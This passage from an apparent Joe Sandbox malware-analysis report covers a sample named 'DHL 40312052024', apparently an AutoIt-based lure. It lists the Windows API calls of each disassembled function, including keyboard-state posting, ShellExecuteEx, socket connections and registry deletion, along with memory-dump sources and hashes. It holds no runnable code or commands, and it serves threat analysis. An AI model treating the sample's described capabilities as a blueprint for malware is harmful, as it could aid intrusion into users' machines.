                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 046abcd4bde7f7c5f476c3fac3509f4d161f01a6599fe4b6b864dbadd46ca3a8
                                                                                    • Instruction ID: e5a733b7beb7f3d261b09afed708e71e13ccc7416b1f6007f5613555339f136c
                                                                                    • Opcode Fuzzy Hash: 046abcd4bde7f7c5f476c3fac3509f4d161f01a6599fe4b6b864dbadd46ca3a8
                                                                                    • Instruction Fuzzy Hash: E4716930900149EFCB15CF98CC98AFFBB79FF89310F948159F915AA251D738AA51CBA0
                                                                                    APIs
                                                                                    • IsWindow.USER32(01226D28), ref: 0083B3EB
                                                                                    • IsWindowEnabled.USER32(01226D28), ref: 0083B3F7
                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0083B4DB
                                                                                    • SendMessageW.USER32(01226D28,000000B0,?,?), ref: 0083B512
                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0083B54F
                                                                                    • GetWindowLongW.USER32(01226D28,000000EC), ref: 0083B571
                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0083B589
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                    • String ID:
                                                                                    • API String ID: 4072528602-0
                                                                                    • Opcode ID: 22e0a4d11bd80c2829df8bf0ca4409d3483358466ef6f5cf425aba7ff638440d
                                                                                    • Instruction ID: df1fa149207ee826b18b818b211fdaeb9fa6e2f638cc3978b866994cef78ed3c
                                                                                    • Opcode Fuzzy Hash: 22e0a4d11bd80c2829df8bf0ca4409d3483358466ef6f5cf425aba7ff638440d
                                                                                    • Instruction Fuzzy Hash: FB71BDB4601204EFDB24DF54C895FBABBA9FF89300F148469EB45D73A2D771A940CB98
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0082F448
                                                                                    • _memset.LIBCMT ref: 0082F511
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0082F556
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                      • Part of subcall function 007CFC86: _wcscpy.LIBCMT ref: 007CFCA9
                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0082F5CD
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0082F5FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                    • String ID: @
                                                                                    • API String ID: 3522835683-2766056989
                                                                                    • Opcode ID: d9fb01c78ef50201067ef917ffb09c91a83759334e0d72498b3de1c1c936a761
                                                                                    • Instruction ID: 9d28b9da2e9653b309080678e4c2483af58bcbe91c2ba8b69b1d93fea8333307
                                                                                    • Opcode Fuzzy Hash: d9fb01c78ef50201067ef917ffb09c91a83759334e0d72498b3de1c1c936a761
                                                                                    • Instruction Fuzzy Hash: 4761C271A00629DFCB14EF64C885AAEBBF5FF49310F148069EA55AB352CB34AD41CF90
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 00810F8C
                                                                                    • GetKeyboardState.USER32(?), ref: 00810FA1
                                                                                    • SetKeyboardState.USER32(?), ref: 00811002
                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00811030
                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0081104F
                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00811095
                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008110B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: 1d1588bbd8fb0ca21d64ad6de51614ff575ffc111077354312973a80e09612e7
                                                                                    • Instruction ID: 4e0349014aa2eac80fd01004c3439319036b344f62b5f2c1c08c13a732af8f31
                                                                                    • Opcode Fuzzy Hash: 1d1588bbd8fb0ca21d64ad6de51614ff575ffc111077354312973a80e09612e7
                                                                                    • Instruction Fuzzy Hash: D051C0A0904AD539FF3646348C0ABF6BEADBF0A304F088589E2D4C58D3C6E4D8C5DB51
                                                                                    APIs
                                                                                    • GetParent.USER32(00000000), ref: 00810DA5
                                                                                    • GetKeyboardState.USER32(?), ref: 00810DBA
                                                                                    • SetKeyboardState.USER32(?), ref: 00810E1B
                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00810E47
                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00810E64
                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00810EA8
                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00810EC9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: 563a4775f8d69094494b547d88152abc2198da6450b80f05786a9d6a416f57f0
                                                                                    • Instruction ID: 591b586b009c02ecff7fcec7c9cdbcda3c9739a2bf5bb7a4ad3b605e66e97973
                                                                                    • Opcode Fuzzy Hash: 563a4775f8d69094494b547d88152abc2198da6450b80f05786a9d6a416f57f0
                                                                                    • Instruction Fuzzy Hash: 5751C1A05086D57DFB3282658C45BFA7EADFF06300F088989E1D4CA8C2D7D5ACD8DB51
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 2945705084-0
                                                                                    • Opcode ID: 7a1ac131a043efa4840c9471823c00b415ae200f575d9306499e343dde445628
                                                                                    • Instruction ID: c23b2c2cd07c7d7a4edc82f7957b7fc2fbe8b6345a8699813e79623438445b43
                                                                                    • Opcode Fuzzy Hash: 7a1ac131a043efa4840c9471823c00b415ae200f575d9306499e343dde445628
                                                                                    • Instruction Fuzzy Hash: A041B565C10218F6CB11EBB4CC4AACFB7BCAF44310F504857E519E3221FA39A296C7E6
                                                                                    APIs
                                                                                      • Part of subcall function 0081466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00813697,?), ref: 0081468B
                                                                                      • Part of subcall function 0081466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00813697,?), ref: 008146A4
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 008136B7
                                                                                    • _wcscmp.LIBCMT ref: 008136D3
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 008136EB
                                                                                    • _wcscat.LIBCMT ref: 00813733
                                                                                    • SHFileOperationW.SHELL32(?), ref: 0081379F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1377345388-1173974218
                                                                                    • Opcode ID: 89c30107689a4a8e6ab0d205a3e22e7f69fce2f28315e445f89aa22edbbc881e
                                                                                    • Instruction ID: e37298b6134eaa0957b3261ea7f6f03d851554c5efa055a9173e2ea204eb6837
                                                                                    • Opcode Fuzzy Hash: 89c30107689a4a8e6ab0d205a3e22e7f69fce2f28315e445f89aa22edbbc881e
                                                                                    • Instruction Fuzzy Hash: 53416BB1508344AAD751EF64D455AEFB7ECFF99380F00092EB49AC3291EA34D689C752
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 008372AA
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00837351
                                                                                    • IsMenu.USER32(?), ref: 00837369
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008373B1
                                                                                    • DrawMenuBar.USER32 ref: 008373C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 3866635326-4108050209
                                                                                    • Opcode ID: 36b46ca52423f85a2b9c2e91a8da99471f9e6cf6e9f66c11c181253ae28d2b1f
                                                                                    • Instruction ID: 6c5e9f236b7a7384ec57fb3e8fcf84c49247e18b82f29c4dfc14168cdccf55cf
                                                                                    • Opcode Fuzzy Hash: 36b46ca52423f85a2b9c2e91a8da99471f9e6cf6e9f66c11c181253ae28d2b1f
                                                                                    • Instruction Fuzzy Hash: D34125B5A05209EFDB20DF50D884EAABBB8FB48314F548429FD55A7360D770ED50DB90
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00830FD4
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00830FFE
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 008310B5
                                                                                      • Part of subcall function 00830FA5: RegCloseKey.ADVAPI32(?), ref: 0083101B
                                                                                      • Part of subcall function 00830FA5: FreeLibrary.KERNEL32(?), ref: 0083106D
                                                                                      • Part of subcall function 00830FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00831090
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00831058
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                    • String ID:
                                                                                    • API String ID: 395352322-0
                                                                                    • Opcode ID: d8643815ac0d4fd636dc85093be608b8978e981fff63eab38a4d7f86cabbf535
                                                                                    • Instruction ID: e6939287c00645a1785ef5b092e3034da40a8c8df50f6024a4439082d09cacd3
                                                                                    • Opcode Fuzzy Hash: d8643815ac0d4fd636dc85093be608b8978e981fff63eab38a4d7f86cabbf535
                                                                                    • Instruction Fuzzy Hash: 3131E871D01509AFDF199BA4DC99AFFB7BCFF48300F00056AE601E2151EB749E859AA1
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008362EC
                                                                                    • GetWindowLongW.USER32(01226D28,000000F0), ref: 0083631F
                                                                                    • GetWindowLongW.USER32(01226D28,000000F0), ref: 00836354
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00836386
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008363B0
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 008363C1
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008363DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 2178440468-0
                                                                                    • Opcode ID: 9a58d729b0d7f1613a7911f18f526042e6b366bb1a8f6b1354fcd2093e9c5e6d
                                                                                    • Instruction ID: 49365d698811378b4f1db173133c2380ab1854c33eddbb284ac98a8ce549ca12
                                                                                    • Opcode Fuzzy Hash: 9a58d729b0d7f1613a7911f18f526042e6b366bb1a8f6b1354fcd2093e9c5e6d
                                                                                    • Instruction Fuzzy Hash: 9031F331A44151AFDB208F18DC89F553BE1FB9A714F198168F605CF2B2EB71A8909B91
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080DB2E
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080DB54
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0080DB57
                                                                                    • SysAllocString.OLEAUT32(?), ref: 0080DB75
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0080DB7E
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0080DBA3
                                                                                    • SysAllocString.OLEAUT32(?), ref: 0080DBB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: b391ae45ec84eb3e67d449ab7fe49041cec87ba570d788c20f20728085fba187
                                                                                    • Instruction ID: 51f4a2b390d5aa3c329bf3e476a84cb677473bebf1cc8976af55b64fc304323e
                                                                                    • Opcode Fuzzy Hash: b391ae45ec84eb3e67d449ab7fe49041cec87ba570d788c20f20728085fba187
                                                                                    • Instruction Fuzzy Hash: 99217F36600219AFDB50AFE8DC88CBB77ACFB09370B018525FE14DB2A1D6749C458BA4
                                                                                    APIs
                                                                                      • Part of subcall function 00827D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00827DB6
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008261C6
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 008261D5
                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0082620E
                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00826217
                                                                                    • WSAGetLastError.WSOCK32 ref: 00826221
                                                                                    • closesocket.WSOCK32(00000000), ref: 0082624A
                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00826263
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 910771015-0
                                                                                    • Opcode ID: 156a6c1df4d490f808c5380c5a9535f6a020d3aa750a4e241361dbdcda0e404b
                                                                                    • Instruction ID: 25c7b0ba3f82c13436432e4bbc57d397b0e4d9ab4fa830d3fcd78a3c763be572
                                                                                    • Opcode Fuzzy Hash: 156a6c1df4d490f808c5380c5a9535f6a020d3aa750a4e241361dbdcda0e404b
                                                                                    • Instruction Fuzzy Hash: 6A319031600128ABDF10AF24DC89BBA77ADFF45724F044429FA05E7292DB74AC548AA1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                    • API String ID: 1038674560-2734436370
                                                                                    • Opcode ID: 337ff9e72b211045cb373b50cec48b88c714acb4548d61ad4891d11c8a345d39
                                                                                    • Instruction ID: 49d5b825396638615b368cbe8814d6823f9bfc16709f7c561b3f95e4b1ffaae8
                                                                                    • Opcode Fuzzy Hash: 337ff9e72b211045cb373b50cec48b88c714acb4548d61ad4891d11c8a345d39
                                                                                    • Instruction Fuzzy Hash: D3217972204551AAD270A634AC06FB773E8FF65314F10803AFA55C66D3FB999D42C396
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080DC09
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080DC2F
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0080DC32
                                                                                    • SysAllocString.OLEAUT32 ref: 0080DC53
                                                                                    • SysFreeString.OLEAUT32 ref: 0080DC5C
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0080DC76
                                                                                    • SysAllocString.OLEAUT32(?), ref: 0080DC84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: ce020c8caece7371cfa098b3624ea5170862bef0ae81cbe4e7890af7d4621f78
                                                                                    • Instruction ID: eff26008b0252204081e204cc3490cb3bc27b0f99156970bc971812fdf677738
                                                                                    • Opcode Fuzzy Hash: ce020c8caece7371cfa098b3624ea5170862bef0ae81cbe4e7890af7d4621f78
                                                                                    • Instruction Fuzzy Hash: 51213035604204AFEB54ABE8DD88DAB77ACFF49360B108525FA14CB2A1DAB4DC45C7A4
                                                                                    APIs
                                                                                      • Part of subcall function 007B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007B1D73
                                                                                      • Part of subcall function 007B1D35: GetStockObject.GDI32(00000011), ref: 007B1D87
                                                                                      • Part of subcall function 007B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007B1D91
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00837632
                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0083763F
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0083764A
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00837659
                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00837665
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 1025951953-3636473452
                                                                                    • Opcode ID: 4889326f6c478c73baf0bf89c412e5f8bea694eb8ec7530f543bffdf26e897a3
                                                                                    • Instruction ID: dbf1bd6ed8fe4c38d675853e65d0809f721d06568735cc05513506919eec56b0
                                                                                    • Opcode Fuzzy Hash: 4889326f6c478c73baf0bf89c412e5f8bea694eb8ec7530f543bffdf26e897a3
                                                                                    • Instruction Fuzzy Hash: 401190B2110219BFEF159F64CC86EEB7F6DFF48798F014114BA04A20A0DA72DC21DBA4
APIs
• __init_pointers.LIBCMT ref: 007D9AE6
  • Part of subcall function 007D3187: EncodePointer.KERNEL32(00000000), ref: 007D318A
  • Part of subcall function 007D3187: __initp_misc_winsig.LIBCMT ref: 007D31A5
  • Part of subcall function 007D3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 007D9EA0
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007D9EB4
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007D9EC7
